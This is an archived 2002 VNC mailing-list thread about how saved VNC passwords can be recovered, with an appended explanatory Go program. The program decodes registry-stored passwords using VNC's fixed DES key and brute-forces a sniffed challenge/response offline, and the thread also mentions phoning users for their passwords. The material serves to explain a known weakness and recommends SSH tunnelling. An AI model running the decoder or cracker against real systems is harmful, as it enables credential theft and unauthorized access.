VNC is "hackable"
Thu Aug 29 19:57:00 2002
Also, be wary about saving your passwords in config files. This has been a common topic among our VNCScan users. Network Administrators have found their co-workers saving them to hard drives that were not protected very well. No need to sniff if you can pull them from a network share. Also, a couple of other VNC management tools save your password in a database or file. If you use those apps, I strongly advise against using that feature. Sure, it's convenient to avoid typing in the password each time, but consider the inherent security risks with saving them there.
By the way, we're almost done with the .NET version of VNCScan. This version is going to open a lot of new doors for "wow" features. Stay tuned to http://www.vncscan.com for news as it arrives.
From: Richard Harris [mailto:firstname.lastname@example.org]
Sent: Thursday, August 29, 2002 8:18 AM
Subject: Re: VNC is "hackable"
> Am I wrong?
> Wouldn't they have to sniff packets and decrypt to get the password?
> suppose it can be done, but I don't know that anyone is doing it.
I don't know about packet sniffing, but the password can be compromised. You
can read the WinVNC password from the registry and there is a "vncdec.c"
program that will decrypt the password for you.
There's no registry security on 95/98 - so how hard would it be for a hacker to
access it? <shrug>. NT/2000 are better, but we all know that those systems
can and are hacked.
What's the deal with programs like zVNC? They use a different connection
mechanism, so am I right in saying that the connection is secure, but the
registry loophole remains.
The question is: can packets be sniffed and this encrypted password be broken
with the same registry key code cracker? Any volunteers?
IMO, one solution would be some sort of SSH (or local VPN?) connection to
the VNC host and then connect via loopback. Easy enough on unix, but not so
easy on Windows. I guess this would be a perfect use for a modular VNC distro. :-)
But then if you want to hack someone's system, I'd say you'd go for the weakest
systems first. Try your hand at compromising the local box first. Trawl the
registry for saved passwords, or even old PWL files... Failing that, just ring
up and ask a user... it's surprising how many people will just tell you their
password over the phone.
"Service, price , quality: pick any two."
VNC-List mailing list
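The two weaknesses discussed in this thread (the "vncdec.c" registry decoder and the open question of whether a sniffed password exchange can be broken offline) can be shown in one small program. This is an added example written for this archive page; it is not code from the thread, from VNCScan or from the VNC project. It relies on two facts about the classic VNC protocol: the stored password is 8 bytes DES-encrypted under the fixed key published in RealVNC's vncauth.c (23,82,107,6,35,78,88,7), and the VNC 3.3 handshake has the client encrypt the server's 16-byte challenge as two DES-ECB blocks using the password itself (truncated or zero-padded to 8 bytes) as the key. VNC's d3des reads each key byte with its bits reversed, so a standard DES implementation, here Go's crypto/des, must reverse the key bits first. The password "s3cret", the challenge bytes and the wordlist are constructed for the demonstration.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// vncFixedKey is the constant DES key WinVNC/vncpasswd use to obfuscate the
// stored password (RealVNC vncauth.c). Since the key is public, a password
// saved in the registry or a config file is only one DES block away.
var vncFixedKey = [8]byte{23, 82, 107, 6, 35, 78, 88, 7}

// vncDESKey converts a VNC key into the key a standard DES implementation
// expects: VNC's d3des reads each key byte with its bits in reverse order.
func vncDESKey(key [8]byte) []byte {
	out := make([]byte, 8)
	for i, b := range key {
		out[i] = bits.Reverse8(b)
	}
	return out
}

// passwordKey truncates or zero-pads a password to the 8 bytes VNC uses as a key.
// Anything past the 8th character is silently ignored by the protocol.
func passwordKey(password string) [8]byte {
	var k [8]byte
	copy(k[:], password)
	return k
}

// ObfuscatePassword produces the 8-byte blob WinVNC writes to the registry.
func ObfuscatePassword(password string) ([]byte, error) {
	block, err := des.NewCipher(vncDESKey(vncFixedKey))
	if err != nil {
		return nil, err
	}
	pw := passwordKey(password)
	out := make([]byte, 8)
	block.Encrypt(out, pw[:])
	return out, nil
}

// DeobfuscatePassword does what the thread's vncdec.c does: recover the
// plaintext from the stored blob using the fixed key.
func DeobfuscatePassword(blob []byte) (string, error) {
	if len(blob) != 8 {
		return "", fmt.Errorf("expected 8-byte blob, got %d", len(blob))
	}
	block, err := des.NewCipher(vncDESKey(vncFixedKey))
	if err != nil {
		return "", err
	}
	out := make([]byte, 8)
	block.Decrypt(out, blob)
	return string(bytes.TrimRight(out, "\x00")), nil
}

// ChallengeResponse computes what a VNC 3.3 client sends back: the 16-byte
// server challenge encrypted as two DES-ECB blocks under the password key.
func ChallengeResponse(password string, challenge []byte) ([]byte, error) {
	if len(challenge) != 16 {
		return nil, fmt.Errorf("challenge must be 16 bytes, got %d", len(challenge))
	}
	block, err := des.NewCipher(vncDESKey(passwordKey(password)))
	if err != nil {
		return nil, err
	}
	resp := make([]byte, 16)
	block.Encrypt(resp[:8], challenge[:8])
	block.Encrypt(resp[8:], challenge[8:])
	return resp, nil
}

// CrackSniffedAuth answers the thread's question: given a challenge/response
// pair captured off the wire, try candidate passwords offline and return the
// one that reproduces the response. The server is never contacted.
func CrackSniffedAuth(challenge, response []byte, candidates []string) (string, bool) {
	for _, c := range candidates {
		r, err := ChallengeResponse(c, challenge)
		if err == nil && bytes.Equal(r, response) {
			return c, true
		}
	}
	return "", false
}

func main() {
	// Constructed sample: a saved password and one captured handshake.
	blob, _ := ObfuscatePassword("s3cret")
	fmt.Printf("registry blob:           %s\n", hex.EncodeToString(blob))
	pw, _ := DeobfuscatePassword(blob)
	fmt.Printf("recovered from registry: %q\n", pw)

	challenge := []byte("0123456789abcdef") // constructed; a real server sends random bytes
	resp, _ := ChallengeResponse("s3cret", challenge)
	fmt.Printf("sniffed response:        %s\n", hex.EncodeToString(resp))

	wordlist := []string{"password", "vnc", "admin", "s3cret", "letmein"}
	if found, ok := CrackSniffedAuth(challenge, resp, wordlist); ok {
		fmt.Printf("password recovered offline from sniffed traffic: %q\n", found)
	}
}
```

Two things follow from running it. The registry decoder and the handshake cracker are not the same tool, because the stored blob is keyed with the fixed key while the challenge is keyed with the password, but they share the same DES routine, so anyone holding one has the other. And because the effective key is at most 8 characters and every candidate can be checked offline against a single captured exchange, a dictionary or exhaustive search is feasible without ever touching the server; tunnelling the session over SSH, as suggested in the thread, keeps the challenge and response off the wire in the first place.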